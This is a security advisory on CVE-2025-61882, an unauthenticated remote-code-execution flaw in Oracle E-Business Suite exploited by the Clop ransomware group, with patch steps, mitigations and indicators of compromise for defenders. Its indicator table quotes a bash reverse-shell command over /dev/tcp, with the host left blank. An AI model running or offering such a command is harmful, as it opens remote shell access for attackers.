Critical Oracle EBS 0-Day Hit by Clop Ransomware; Oracle Released Emergency Patch
Summary : Security Advisory: Clop Ransomware aimed at extortion of emails targeting customers of Oracle E-Business Suite. The zero-day vulnerability affected Oracle EBusiness Suite (EBS), specifically the Concurrent Processing component used with BI Publisher Integration and is remotely exploitable without authentication. This allows attackers to execute arbitrary code via HTTP.
| OEM | Oracle |
| Severity | Critical |
| CVSS Score | 9.8 |
| CVEs | CVE-2025-61882 |
| POC Available | Yes |
| Actively Exploited | Yes |
| Advisory Version | 1.0 |
Overview
Oracle released an emergency patch and Clop ransomware group actively exploited this flaw in real-world data theft campaigns targeting vulnerable versions using by the organizations.
All EBS versions from 12.2.3 to 12.2.14 are affected and immediate patching requires mitigate the vulnerability.
| Vulnerability Name | CVE ID | Product Affected | Severity | Affected Version |
| RCE vulnerability in Oracle E-Business Suite | CVE-2025-61882 | Oracle E-Business Suite | Critical | 12.2.3 through 12.2.14 |
Technical Summary
The vulnerability allows attackers to gain remote code execution by sending specially crafted HTTP requests to exposed Oracle EBS services. Once exploited, it enables full system compromise, including reverse shell access. The vulnerability has been using by Clop ransomware group in conjunction with other previously known EBS flaws to exfiltrate sensitive data and extort victims. Indicators of compromise (IoCs) such as malicious IPs, shell commands, and exploit files have been published to help organizations detect past intrusions.
Oracle’s fix includes the patch for this flaw but also mitigates additional exploitation paths identified during their internal investigation.
| CVE ID | Component Affected | Vulnerability Details | Impact |
| CVE-2025-61882 | BI Publisher Integration | A critical unauthenticated RCE in Oracle EBusiness Suite affecting the Concurrent Processing/BI Publisher integration. | Full system compromise, data theft. |
Recommendations
Users And Administrators should immediately apply the Security Patch for CVE202561882 on all affected Oracle E-Business Suite systems:
- Log in to My Oracle Support.
- Use the patch availability document & search for the patch specific to CVE-2025-61882 for your OS and Oracle EBS version.
Prerequisite: Ensure the October 2023 Critical Patch Update (CPU) is already installed.
Here are some recommendations below
- If immediate patching is not possible, restrict HTTP/HTTP/HTTPS access to the EBS application from untrusted networks.
- Review server logs, network traffic and system processes to detect signs of exploitation.
- Monitor for known Indicators of Compromise (IoCs) provided by Oracle from the table below.
IOCs
| Indicator | Type | Description |
| 200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
| 185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
Source: Oracle
Conclusion:
This is the ongoing threat exploitation by the ransomware group, particularly for unpatched Oracle EBS deployments.
As this is being actively exploited in the wild, upgrade to the supported patched version and organizations should also review logs, investigate for signs of compromise using Oracle’s IoCs, and strengthen network access controls around EBS systems. Immediate action is required to reduce the risk of further exploitation, data loss and operational disruption.
References: